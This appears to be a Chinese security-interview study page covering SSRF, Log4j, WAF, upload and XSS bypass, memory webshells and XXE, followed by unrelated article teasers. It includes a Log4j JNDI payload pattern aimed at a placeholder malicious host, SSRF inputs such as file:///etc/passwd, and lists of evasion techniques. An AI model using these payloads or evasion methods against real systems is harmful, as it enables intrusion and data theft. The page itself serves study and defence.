安全面试2

文章目录

  • 简单描述一下什么是水平越权,什么是垂直越权,我要发现这两类漏洞,那我代码审计要注意什么地方
    • 水平越权:
    • 垂直越权:
    • 水平越权漏洞的审计重点
    • 垂直越权漏洞的审计重点
  • 解释一下ssrf
    • 漏洞原理
    • 攻击场景
    • 修复方法
  • 横向移动
  • 提权
    • win权限提升
    • Linux权限提升
  • include 和 require区别
  • 绕waf的常见姿势
  • log4g
  • 有哪些混淆绕过的方法
  • 文件上传绕过
  • XSS绕过
  • 内存马
    • 常见实现方式:
    • 内存马的特点
    • 内存马的检测

简单描述一下什么是水平越权,什么是垂直越权,我要发现这两类漏洞,那我代码审计要注意什么地方

水平越权:

用户能够访问或操作其他同级用户的资源或数据。

垂直越权:

低权限用户能够访问或操作高权限用户的功能或资源。

水平越权漏洞的审计重点

  1. 检查涉及用户数据的接口(如/user/profile?id=123),确保当前用户只能访问自己的数据。
  2. 查找是否直接使用用户提供的参数(如用户ID)查询数据库,而未验证其权限。

垂直越权漏洞的审计重点

  1. 检查涉及管理员功能的接口(如/admin/delete_user),确保只有管理员可以访问。
  2. 查找是否缺少对用户角色的验证。

解释一下ssrf

漏洞原理

攻击者通过构造恶意URL,让服务器访问内部系统(如数据库、管理后台)或外部资源,从而获取敏感信息或执行恶意操作。

攻击场景

  1. 访问内部服务:
    攻击者让服务器访问内网服务(如http://127.0.0.1:8080/admin),获取敏感信息。
  2. 绕过防火墙:内网服务通常对外不可访问,但通过SSRF,攻击者可以绕过防火墙限制。
  3. 文件读取:利用file://协议读取服务器本地文件(如file:///etc/passwd)。
  4. 端口扫描:通过SSRF探测内网开放的端口和服务。

修复方法

  1. 限制协议:
    只允许HTTP/HTTPS协议,禁止file://、gopher://等危险协议。
  2. 白名单校验:
    只允许访问特定的域名或IP地址。
  3. 禁用重定向:
    防止攻击者通过重定向访问内部资源。
  4. 使用DNS解析:
    解析URL的域名,确保其指向允许的外部地址,而不是内网IP。

横向移动

在内⽹渗透中,当攻击者获取到内⽹某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种⽅法,访问域内其他机器,进⼀步扩⼤资产范围。通过横向,攻击者最终获得域控制器的访问权限,甚⾄完全控制基于Windows操作系统的整个内⽹环境,控制域环境下的全部机器。

提权

win权限提升

在这里插入图片描述

Linux权限提升

在这里插入图片描述

include 和 require区别

include会执行多次,导致报错(重复定义变量)。。而include_once不会出现这种情况。
require和include区别在于:若未包含文件,则报错形式不一样。(require包含错误文件,则include后不
再执行;include未包含文件,会警告,但是仍会执行后面的。)

绕waf的常见姿势

  1. 混淆和编码:Base64 编码
    ,URL 编码,Unicode 编码,Hex 编码:将 payload 转换为十六进制,双重编码
  2. 大小写混淆:WAF 的规则可能是大小写敏感的,通过改变 payload 的大小写可以绕过检测。
  3. 注释符混淆:在 SQL 注入中,使用注释符(如 /* */、–)可以绕过 WAF 的检测。
  4. 分块传输编码:利用 HTTP 分块传输编码(Chunked Transfer Encoding)绕过 WAF 的检测。
  5. HTTP 参数污染(HPP):通过重复提交参数,使 WAF 无法正确解析参数值。
  6. 使用非常规 HTTP 方法:使用 PUT、DELETE、OPTIONS 等方法。
  7. 利用 WAF 的规则盲区:超长 payload:WAF 可能对超长 payload 的检测不严格。
    特殊字符:使用 WAF 未检测的特殊字符。
    多语言 payload:使用非 ASCII 字符。
  8. 时间延迟绕过:在 SQL 注入中,使用时间延迟函数(如 SLEEP())绕过 WAF 的检测。
  9. 利用 WAF 的缓存机制:WAF 可能缓存某些请求,通过构造特殊请求绕过检测。

log4g

Log4j是Java开发中广泛使用的日志记录框架,攻击者可以通过构造恶意日志消息触发远程代码执行,从而完全控制目标服务器
漏洞原理
Log4j2支持Lookup功能,允许在日志中动态解析变量(如${java:os})。

攻击者可以通过输入类似${jndi:ldap://恶意地址/攻击代码}的字符串,触发Log4j2向远程服务器请求并执行恶意代码。

由于Log4j2的递归解析特性,攻击者无需特殊配置即可利用该漏洞
修复
删除JndiLookup.class文件,禁用JNDI功能

有哪些混淆绕过的方法

  1. 变量名混淆:将变量名替换为无意义的随机字符串。
  2. 字符串加密:将字符串加密或编码,运行时解密。
  3. 控制流混淆:改变代码的执行顺序,增加跳转和条件判断。
  4. 代码拆分:将代码拆分为多个部分,运行时动态拼接。

文件上传绕过

  1. 文件类型伪装:修改文件扩展名或MIME类型。
  2. 文件内容混淆:在文件中插入垃圾数据或修改文件头。
  3. 多文件上传:通过上传多个文件,利用服务器解析差异绕过检测。

XSS绕过

  1. 标签混淆:使用非常规的HTML标签或属性。
  2. 事件混淆:使用不同的事件触发XSS。
  3. 编码绕过:对XSS代码进行HTML编码或JavaScript编码。

内存马

内存马的核心思想是通过修改目标应用程序的内存数据(如Servlet、Filter、Controller等),动态注入恶意代码,从而在服务器内存中创建一个隐蔽的后门。

常见实现方式:

  1. Servlet内存马:通过动态注册一个恶意的Servlet,处理特定请求。
  2. Filter内存马:通过动态注册一个恶意的Filter,拦截所有请求。
  3. Controller内存马:在Spring等框架中,动态注册一个恶意的Controller。
  4. Agent内存马:通过Java Agent技术,动态修改类的字节码。

内存马的特点

无文件落地,隐蔽性强,持久化,高权限:

内存马的检测

内存分析,行为监控,流量分析

XXE
XXE漏洞的成因
XXE漏洞的核心问题是XML解析器在处理外部实体时未进行严格限制,导致攻击者可以通过构造恶意XML文档实现以下攻击:

  1. 读取服务器上的任意文件。
  2. 发起SSRF(服务器端请求伪造)攻击。
  3. 执行远程代码(在某些情况下)。
    修复XXE漏洞的核心是禁用外部实体解析。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/975489.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

数字电子技术基础(二十一)——双极型三极管的开关特性

目录 1 半导体三极管的开关特性 1.1 双极性三极管的开关特性 1.2 双极型三极管的基本开关电路 1.3 三极管的开关等效电路 1.4 双极型三极管的动态开关特性 TTL门电路是一种基于双极型晶体管的数字逻辑电路,在20世纪60年代到80年代之间,TTL门电路是应…

足疗店会员管理系统,足疗养生全方位会员管理解决方案,佳易王试用版养生会所足疗店推拿按摩会员管理系统操作教程

一、概述 本实例以佳易王试用版养生会所足疗店推拿按摩会员管理系统17.1版本为例说明,其他版本可参考本实例。试用版软件资源可到文章最后了解,下载的文件为压缩包文件,请使用免费版的解压工具解压即可试用。 软件特点: 1、功能…

【HarmonyOS Next】拒绝权限二次申请授权处理

【HarmonyOS Next】拒绝权限二次申请授权处理 一、问题背景: 在鸿蒙系统中,对于用户权限的申请,会有三种用户选择方式: 1.单次使用允许 2.使用应用期间(长时)允许 3.不允许 当用户选择不允许后&#xff0…

论文笔记(七十二)Reward Centering(四)

Reward Centering(四) 文章概括摘要附录A 伪代码 文章概括 引用: article{naik2024reward,title{Reward Centering},author{Naik, Abhishek and Wan, Yi and Tomar, Manan and Sutton, Richard S},journal{arXiv preprint arXiv:2405.09999…

数据结构之二叉树的定义及实现

1. 树的概念 主要的定义: 节点的度:一个节点含有的子树的个数称为该节点的度;如上图:A的为6 叶节点或终端节点:度为0的节点称为叶节点;如上图:B,C,H,I等节点…

Deepseek 与 ChatGPT:AI 浪潮中的双子星较量

引言 在人工智能飞速发展的当下,AI 语言模型成为了人们关注的焦点。Deepseek 与 ChatGPT 作为其中的佼佼者,各自展现出独特的魅力,引领着 AI 技术的发展潮流。今天,就让我们深入探讨这两款模型,看看它们在 AI 领域中是…

网络运维学习笔记 019 HCIA-Datacom综合实验03

文章目录 综合实验3实验需求一:A公司网络规划二:B公司网络规划 配置一、ip、vlan、vlanif,stp、eth-trunkSW1SW2SW3R1 二、ospfSW1R1 三、NATR1ISP 四、拒绝ping允许httpSW1 五、右半部分vlan、dhcp、ospf、NATSW4R2 综合实验3 实验需求 一&…

【时时三省】(C语言基础)结构化程序设计方法

山不在高,有仙则名。水不在深,有龙则灵。 ----CSDN 时时三省 结构化程序设计方法 结构化程序设计强调程序设计风格和程序结构的规范化,提倡清晰的结构。怎样才能得到一个结构化的程序呢?如果面临一个复杂的问题,是难以一下子写…

“国补”带火手机换新,出售旧手机应如何保护个人信息安全

在“国补”政策的推动下,手机换新热潮正席卷而来。“国补”以其诱人的补贴力度,成功激发了消费者更换手机的热情。无论是渴望体验最新技术的科技爱好者,还是对旧手机性能不满的普通用户,都纷纷投身到这场手机换新的浪潮之中。 随着大量消费者参与手机换新,二手手机市场迎来…

Flash-01

1-初始登录页面 2-【文件】-【新建】 3-【ActionScript3.0】 4-常用功能介绍【关闭/开启】 4-1-【关闭开始页】 勾选【不再提示】 4-2-【开启开始页】 【编辑】-【首选参数】-【常规】-【重置所有警告对话框】 5-恢复初始页面 【窗口】-【工作区】-【重置】 6-常用快捷键 …

Golang | 每日一练 (3)

💢欢迎来到张胤尘的技术站 💥技术如江河,汇聚众志成。代码似星辰,照亮行征程。开源精神长,传承永不忘。携手共前行,未来更辉煌💥 文章目录 Golang | 每日一练 (3)题目参考答案map 实现原理hmapb…

DeepSeek掘金——基于DeepSeek-R1构建文档问答机器人

DeepSeek掘金——基于DeepSeek-R1构建文档问答机器人 在这个项目中,我们将结合本地 AI 的隐私与 Deepseek R1 的智能,创建一个完全本地化、推理驱动的问答机器人。 在人工智能 (AI) 日益融入我们日常生活的时代,一个问题仍然处于最前沿:隐私。尽管基于云的 AI 系统功能强大…

蓝桥杯学习笔记04-滑动窗口不定长(最短/最小)

题目来源 分享丨【题单】滑动窗口与双指针(定长/不定长/单序列/双序列/三指针/分组循环) - 力扣(LeetCode) 209. 长度最小的子数组 - 力扣(LeetCode) 题目要求大于等于 class Solution { public:int min…

基于WOA鲸鱼优化的BiLSTM双向长短期记忆网络序列预测算法matlab仿真,对比BiLSTM和LSTM

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a/matlab2024b 3.部分核心程序 (完整版代码包含详细中文注释和操作步骤视频…

DeepSeek R1本地+私有云版医疗AI部署开发成功案例技术剖析

1. 引言 1.1 研究背景与意义 随着科技的飞速发展,人工智能(AI)在医疗领域的应用正逐渐成为推动医疗行业变革的重要力量。近年来,医疗 AI 取得了显著的进展,从疾病诊断、药物研发到医疗管理等各个环节,AI 技术都展现出了巨大的潜力。它能够处理和分析海量的医疗数据,为…

【行业解决方案篇十八】【DeepSeek航空航天:故障诊断专家系统 】

引言:为什么说这是“航天故障终结者”? 2025年春节刚过,航天宏图突然官宣"DeepSeek已在天权智能体上线",这个搭载在卫星和空间站上的神秘系统,号称能提前48小时预判99.97%的航天器故障。这不禁让人想起年初NASA禁用DeepSeek引发的轩然大波,更让人好奇:这套系…

四步彻底卸载IDEA!!!

各位看官早安午安晚安呀 如果您觉得这篇文章对您有帮助的话 欢迎您一键三连,小编尽全力做到更好 欢迎您分享给更多人哦 大家好,我们今天来学习四步彻底卸载IDEA!!! 首先我要提醒各位 如果你想删除 IDEA 相关&#xf…

Codes 开源免费研发项目管理平台 2025年第一个大版本3.0.0 版本发布及创新的轻IPD实现

Codes 简介 Codes 是国内首款重新定义 SaaS 模式的开源项目管理平台,支持云端认证、本地部署、全部功能开放,并且对 30 人以下团队免费。它通过创新的方式简化研发协同工作,使敏捷开发更易于实施。并提供低成本的敏捷开发解决方案&#xff0…

BIRCH算法深度解析与实践指南

一、算法全景视角 BIRCH(Balanced Iterative Reducing and Clustering using Hierarchies)是首个针对超大规模数据集的聚类算法,可在有限内存下高效处理十亿级数据。其核心创新在于采用CF Tree数据结构,将数据压缩为多级聚类特征…

更改conda 环境默认安装位置

一、找到".condarc" Windows 下&#xff0c;~/.condarc 文件通常位于 C:\Users\<你的用户名>\.condarc 二、修改内容 在.condarc 里添加上 envs_dirs:- D:\ProgramData\anaconda3\envs- C:\Users\<你的用户名>\.condarc &#xff08;第一个优先&…